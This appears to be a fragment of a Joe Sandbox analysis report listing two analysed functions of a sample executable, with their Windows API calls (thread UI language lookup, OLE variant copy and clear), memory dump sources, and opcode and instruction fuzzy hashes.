        • Part of subcall function 0040CBE0: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,0040CCA1), ref: 0040CC14
      Memory Dump Source
      • Source File: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID: Thread$LanguagesPreferred$Language
      • String ID:
      • API String ID: 2255706666-0
      • Opcode ID: d2c6e7bba8bc72bbbdf077e3e4acd4a6484c427f75bab13a3a274035a5d700a8
      • Instruction ID: b0102d0044ab73f23b321d7d6f6602272ae1975ebb88da2099e514141e5eeb9e
      • Opcode Fuzzy Hash: d2c6e7bba8bc72bbbdf077e3e4acd4a6484c427f75bab13a3a274035a5d700a8
      • Instruction Fuzzy Hash: 4D316F30A0421ADBDB10EFA9D885AAFB7B8FF04314F10467AE515E7391D7789A04CB94
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • VariantCopy.OLEAUT32 ref: 006C389C
        • Part of subcall function 006C3048: VariantClear.OLEAUT32 ref: 006C3057
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID: Variant$ClearCopy
      • String ID: X*l
      • API String ID: 274517740-3061925697
      • Opcode ID: f426b7a77b9917056d4fba03141a3df1ecbde20aff7f728fa90f02b563c57196
      • Instruction ID: cd52d73868f541c82f0ecb16cd641db90badaea0d44612472be3bd043e3e0d3f
      • Opcode Fuzzy Hash: f426b7a77b9917056d4fba03141a3df1ecbde20aff7f728fa90f02b563c57196
      • Instruction Fuzzy Hash: 742195307002218ACB60AF29C4C5FB677E7EF49710714C56EE48B8B316EA74CE86C766
      Uniqueness

      Uniqueness Score: -1.00%